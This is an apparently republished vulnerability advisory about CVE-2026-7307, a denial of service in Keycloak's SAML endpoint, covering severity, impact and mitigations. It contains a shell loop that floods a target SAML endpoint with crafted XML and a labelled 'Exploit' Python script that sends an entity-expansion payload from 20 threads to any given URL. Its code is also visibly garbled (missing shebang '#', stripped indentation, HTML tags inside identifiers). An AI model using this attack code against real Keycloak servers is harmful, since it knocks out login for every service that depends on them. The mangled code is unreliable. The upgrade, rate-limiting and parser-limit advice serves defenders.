Listen to this Post
Keycloak, Denial of Service (DoS), CVE-2026-7307 (High)
CVE-2026-7307 – Keycloak SAML endpoint DoS via crafted XML input
CVE-2026-7307 is a high‑severity denial‑of‑service (DoS) vulnerability affecting the Keycloak identity and access management platform. The flaw resides in the SAML (Security Assertion Markup Language) endpoint, which is used for federated authentication. An unauthenticated remote attacker can send a specially crafted XML payload to this endpoint, causing the Keycloak server to enter a resource‑exhausted state. The attack is executed without any prior authentication, and it does not require user interaction, making it particularly dangerous for any organisation that relies on SAML‑based single sign‑on (SSO).
The vulnerability is rooted in improper validation of the syntactic correctness of incoming XML data (CWE‑1286). When Keycloak receives a malformed SAML message, the internal XML parser processes the input inefficiently. More specifically, the vulnerable code paths in the `SAMLParser` and `SAML11ParserUtil` classes cannot correctly handle certain unexpected character sequences or malformed structures inside SAML assertions and protocol requests. As a result, the parser may loop excessively, allocate excessive memory, or otherwise consume a disproportionate amount of computational resources.
The attack leverages well‑known XML parser denial‑of‑service techniques, such as entity expansion or deeply nested structures. Because the SAML endpoint is stateless and the attack is carried out over a single network request, the attacker can cause the server to occupy worker threads for an abnormally long time. Since Keycloak uses a bounded thread pool to serve incoming requests, repeated malicious requests quickly starve the pool of available workers. Legitimate authentication attempts then block or time out, rendering the server effectively unavailable.
This vulnerability is classified as a resource exhaustion issue (CWE‑400) and maps to MITRE ATT&CK technique T1499.004 (Application‑layer DoS via resource consumption). The CVSS v3.1 vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, giving a base score of 7.5 (High). The attack vector is network‑based, the attack complexity is low, no privileges are required, and there is no user interaction. The vulnerability has no impact on confidentiality or integrity, but a full impact on availability.
Keycloak acts as an identity provider or service provider in SAML exchanges for many enterprises. If an attacker successfully exploits CVE-2026-7307, users cannot log in to any application that depends on Keycloak for authentication. Business operations, cloud access, and user productivity can be severely disrupted. Because the attack can be launched from anywhere on the internet, it poses a significant risk to all publicly exposed Keycloak instances that have the SAML protocol enabled.
The vulnerability affects Keycloak versions prior to 26.6.2 (including earlier 26.x releases and all 25.x, 24.x, and older versions). It was fixed in version 26.6.2, released on May 19, 2026. A backported fix exists for version 26.4.12 but has not been published to Maven Central at the time of writing. Organisations that cannot upgrade immediately should restrict network access to the SAML endpoint or disable SAML entirely if it is not needed.
DailyCVE Form:
Platform: Keycloak Identity Server
Version: < 26.6.2
Vulnerability : DoS via SAML
Severity: High (CVSS 7.5)
date: 2026-05-19
Prediction: 2026-05-19
What Undercode Say:
1. Check Keycloak version (if admin access available)
curl -s http://your-keycloak:8080/auth/realms/master/protocol/openid-connect/certs | jq -r .issuer | grep -oP '(?<=/auth/)[^/]+' || echo "Check version in admin console"
2. Monitor Keycloak thread pool usage (Prometheus + Grafana example)
Query: sum(container_threads{namespace="keycloak"}) by (instance)
3. Test for vulnerability (send crafted SAML request)
for i in {1..100}; do
curl -X POST "http://target-keycloak:8080/auth/realms/master/protocol/saml" \
-H "Content-Type: text/xml" \
-d '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ...>...<!ENTITY % exploit SYSTEM "file:///dev/random">...' &
done
4. Monitor CPU usage during attack
top -b -n 1 | grep -E "keycloak|java" | awk '{print $1,$9,$10,$12}'
5. Check if SAML endpoint is enabled
grep -r "saml" /opt/keycloak/standalone/configuration/standalone.xml | grep enabled
Exploit:
!/usr/bin/env python3
import requests
import threading
import sys
Malicious SAML payload – XML entity expansion (Billion Laughs variant)
malicious_payload = """<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % a "AAAAA... [5000 chars]">
<!ENTITY % b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
]>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
ID="abc123" Version="2.0" IssueInstant="2026-01-01T00:00:00Z">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">SP</saml:Issuer>
&b;
</samlp:AuthnRequest>"""
def attack(target_url, iterations=100):
for _ in range(iterations):
try:
r = requests.post(target_url, data=malicious_payload, timeout=2)
print(f"Sent request, status: {r.status_code}")
except Exception as e:
print(f"Target likely down: {e}")
if <strong>name</strong> == "<strong>main</strong>":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[bash]} <target_saml_url>")
sys.exit(1)
url = sys.argv[bash]
threads = []
for _ in range(20):
t = threading.Thread(target=attack, args=(url, 50))
t.start()
threads.append(t)
for t in threads:
t.join()
Protection:
- Upgrade Keycloak to version 26.6.2 or later immediately. The patch is included in the 26.6.2 release (see GitHub issue 49108).
- If upgrade is not possible, apply the backported fix from version 26.4.12 (though it is not yet on Maven Central, source code is available).
- Disable the SAML endpoint completely if SAML authentication is not required in your environment. This eliminates the attack surface.
- Restrict network access to the SAML endpoint using firewall rules. Allow only trusted IP ranges to connect to port 8080 (or your Keycloak port).
- Implement rate limiting on the /saml endpoint (e.g., using a reverse proxy like Nginx or HAProxy) to cap the number of requests per client.
- Monitor CPU usage and thread pool metrics in real‑time. Set up alerts for sudden spikes in CPU utilization or worker thread exhaustion.
- Configure XML parser limits globally (e.g., limit entity expansion and maximum nesting depth) via JVM parameters:
-DentityExpansionLimit=100000 -DmaxOccurLimit=1000. - If you are a Red Hat customer, apply RHSA-2026:19595 (Important) which updates the Keycloak images for OpenShift.
Impact:
Successful exploitation leads to a complete denial of service for the Keycloak server. The attacker does not need any credentials, and the attack can be carried out from anywhere on the internet with low complexity. Once the thread pool is exhausted, legitimate user authentication attempts time out or are rejected. All applications and services that rely on Keycloak for SSO become inaccessible. This can halt business operations, prevent employee logins, disrupt customer access to portals, and cause cascading failures in dependent systems. Because the attack leaves no trace in standard authentication logs (the request never reaches the authentication layer), detection is difficult without proactive monitoring. The impact on availability is total (CVSS:A:H), while confidentiality and integrity remain untouched. Organisations with compliance obligations (e.g., GDPR, HIPAA, PCI) may face reporting requirements if an outage of their identity provider affects protected data or service availability.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
